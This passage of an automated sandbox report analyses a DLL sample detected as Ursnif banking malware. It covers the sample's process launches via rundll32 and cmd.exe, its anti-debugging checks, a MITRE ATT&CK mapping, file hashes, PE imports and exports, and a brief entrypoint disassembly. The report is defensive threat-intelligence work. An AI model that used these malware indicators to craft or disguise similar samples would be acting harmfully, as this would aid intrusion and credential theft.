Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4C1F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D4C1F6D

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C966F mov eax, dword ptr fs:[00000030h]		0_2_6D4C966F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4C966F mov eax, dword ptr fs:[00000030h]		2_2_6D4C966F

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C1F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4C1F6D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4A07A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4A0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D4A0288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4C1F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D4C1F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D4A07A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4A0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6D4A0288

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: loaddll32.exe, 00000000.00000002.917246686.0000000001A20000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.957190907.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.932674972.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.928824378.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.927424186.0000000003780000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.921221388.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.929091942.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.917246686.0000000001A20000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.957190907.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.932674972.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.928824378.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.927424186.0000000003780000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.921221388.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.929091942.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.917246686.0000000001A20000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.957190907.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.932674972.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.928824378.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.927424186.0000000003780000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.921221388.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.929091942.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.917246686.0000000001A20000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.957190907.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.932674972.00000000030B0000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.928824378.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.927424186.0000000003780000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.921221388.0000000003440000.00000002.00000001.sdmp, rundll32.exe, 00000018.00000002.929091942.00000000030B0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4A0604 cpuid

0_2_6D4A0604

Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6D4DDD96
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4DDF65
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4D3952
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6D4DE518
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4DE61F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6D4DE6EC
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4DE112
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6D4DE19F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D49F1B7
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4DE077
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4DE00E
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoEx,	0_2_6D49F364
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4D4323
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4DE3EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6D4DDD96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D4DDF65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4D3952
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6D4DE518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D4DE61F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6D4DE6EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4DE112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6D4DE19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D49F1B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4DE077
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4DE00E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	2_2_6D49F364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D4D4323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D4DE3EF

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4A09F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6D4A09F0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4D8951 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_6D4D8951

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: n8x3d68Gnd.dll, type: SAMPLE
Source: Yara match	File source: 00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6d460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: n8x3d68Gnd.dll, type: SAMPLE
Source: Yara match	File source: 00000018.00000002.945736297.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.949353578.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.945539240.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.944163100.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.921268168.000000006D461000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6d460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d460000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4616BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		0_2_6D4616BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6D4616BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		2_2_6D4616BC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Rundll321	Input Capture1	System Time Discovery2	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery22	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
n8x3d68Gnd.dll	100%	Avira	TR/Spy.Ursnif.ozghq

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
24.2.rundll32.exe.6d460000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
0.2.loaddll32.exe.6d460000.0.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
3.2.rundll32.exe.6d460000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
21.2.rundll32.exe.6d460000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
13.2.rundll32.exe.6d460000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
2.2.rundll32.exe.6d460000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
16.2.rundll32.exe.6d460000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433105
Start date:	11.06.2021
Start time:	10:13:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	n8x3d68Gnd.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.troj.winDLL@55/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 51.4% (good quality ratio 48.6%) Quality average: 77.4% Quality standard deviation: 28.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): backgroundTaskHost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.790055967805838
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	n8x3d68Gnd.dll
File size:	960000
MD5:	d5c0bac78e53b46b2fff5e470e98210c
SHA1:	a00da4d379748f9e6f2de1006f10156aa8c36f39
SHA256:	b92289a53611d6f8c078e931c3c5c6ce577e05358bdf54389830e962090991b7
SHA512:	72a62feabaa7d94f02efe56a735f5ce6898a2c1f78d996b516deac89510feb353b105efc4662cb64ab1adf93a89d762679e7e53e2ccc59cc31d8d93e313b86ca
SSDEEP:	24576:HQfpzjXPgf98CJV4X+IBIJ3cazaLwj1mCG9CpNiLi:IFDgRJV4OaIRj150CpNiLi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0...0...0....{i.3...9...#...b...4...b...=...b...=....{r.&...0.......b.......b...1...b.b.1...0...1...b...1...Rich0..........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1040052
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5AC512FB [Wed Apr 4 18:01:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7a79d10b1d4343a18a4f6e25e165b4ae

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F75EC7A1517h
call 00007F75EC7A1EF2h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F75EC7A13BFh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F75EC7A0D26h
jmp 00007F75EC7A14F0h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F75EC7A0D15h
jmp 00007F75EC7A14DFh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe35b0	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe364c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfd000	0x9d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe000	0x5074	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xde820	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xde878	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a000	0x26c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x883dc	0x88400	False	0.544624426606	data	6.71833218277	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8a000	0x5a440	0x5a600	False	0.658643456086	data	5.95813601066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe5000	0x17ebc	0x1c00	False	0.184291294643	data	4.04646123564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfd000	0x9d0	0xa00	False	0.396484375	data	3.77819611332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0x5074	0x5200	False	0.726133765244	data	6.63977268899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0xfd1c0	0x10e	data	English	United States
RT_DIALOG	0xfd2d0	0xc0	dBase III DBT, next free block index 4294901761	English	United States
RT_DIALOG	0xfd390	0x126	data	English	United States
RT_DIALOG	0xfd4b8	0xf0	data	English	United States
RT_DIALOG	0xfd5a8	0xba	data	English	United States
RT_DIALOG	0xfd664	0xec	data	English	United States
RT_DIALOG	0xfd750	0x124	data	English	United States
RT_MANIFEST	0xfd874	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetProcessHeap, CreateFileW, SetStdHandle, ReadConsoleW, WriteConsoleW, HeapSize, SetEndOfFile, SetEnvironmentVariableW, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, GetTimeZoneInformation, OutputDebugStringA, OutputDebugStringW, WaitForSingleObjectEx, CreateSemaphoreA, GetSystemTimeAsFileTime, TlsGetValue, VirtualProtectEx, TlsAlloc, GetSystemDirectoryA, GetTempPathA, Sleep, GetCommandLineA, GetModuleHandleA, InitializeCriticalSection, SetSystemPowerState, EnterCriticalSection, VirtualProtect, GetModuleFileNameA, MultiByteToWideChar, GetLastError, FormatMessageW, WideCharToMultiByte, GetStringTypeW, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, GetCurrentThread, GetACP, GetStdHandle, GetFileType, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessA, CreateProcessW, GetFileAttributesExW, WriteFile, GetConsoleCP, GetConsoleMode, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, ReadFile, SetFilePointerEx, HeapReAlloc, SetConsoleCtrlHandler, CreateThread
USER32.dll	SetFocus, GetCursorPos, RegisterClassExA, GetFocus, GetClassInfoExA, GetKeyNameTextA, GetWindowTextLengthA, CallWindowProcA, IsDlgButtonChecked, DestroyIcon, AppendMenuA, DrawIconEx, DrawEdge
GDI32.dll	BitBlt, DeleteDC, CreatePen, DeleteObject, CreateDCA, GetObjectA, DPtoLP
ole32.dll	OleUninitialize, OleSetContainedObject, OleInitialize
SHLWAPI.dll	PathFindFileNameA, PathAddBackslashW, PathStripToRootA
DCIMAN32.dll	DCICreatePrimary, DCIOpenProvider, GetDCRegionData, DCISetDestination, DCICloseProvider, DCICreateOverlay, GetWindowRegionData, DCIEndAccess, WinWatchDidStatusChange, DCICreateOffscreen, DCISetSrcDestClip, DCIDestroy, DCIDraw, DCISetClipList, DCIEnum, DCIBeginAccess, WinWatchClose

Exports

Name	Ordinal	Address
Connectdark	1	0x1021c64
Mindlake	2	0x1020de0
Porthigh	3	0x1021c2c
Problemscale	4	0x1021bf8
WingGrass	5	0x1021b0a

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6996 Parent PID: 6064

General

Start time:	10:14:35
Start date:	11/06/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\n8x3d68Gnd.dll'
Imagebase:	0xdb0000
File size:	116736 bytes
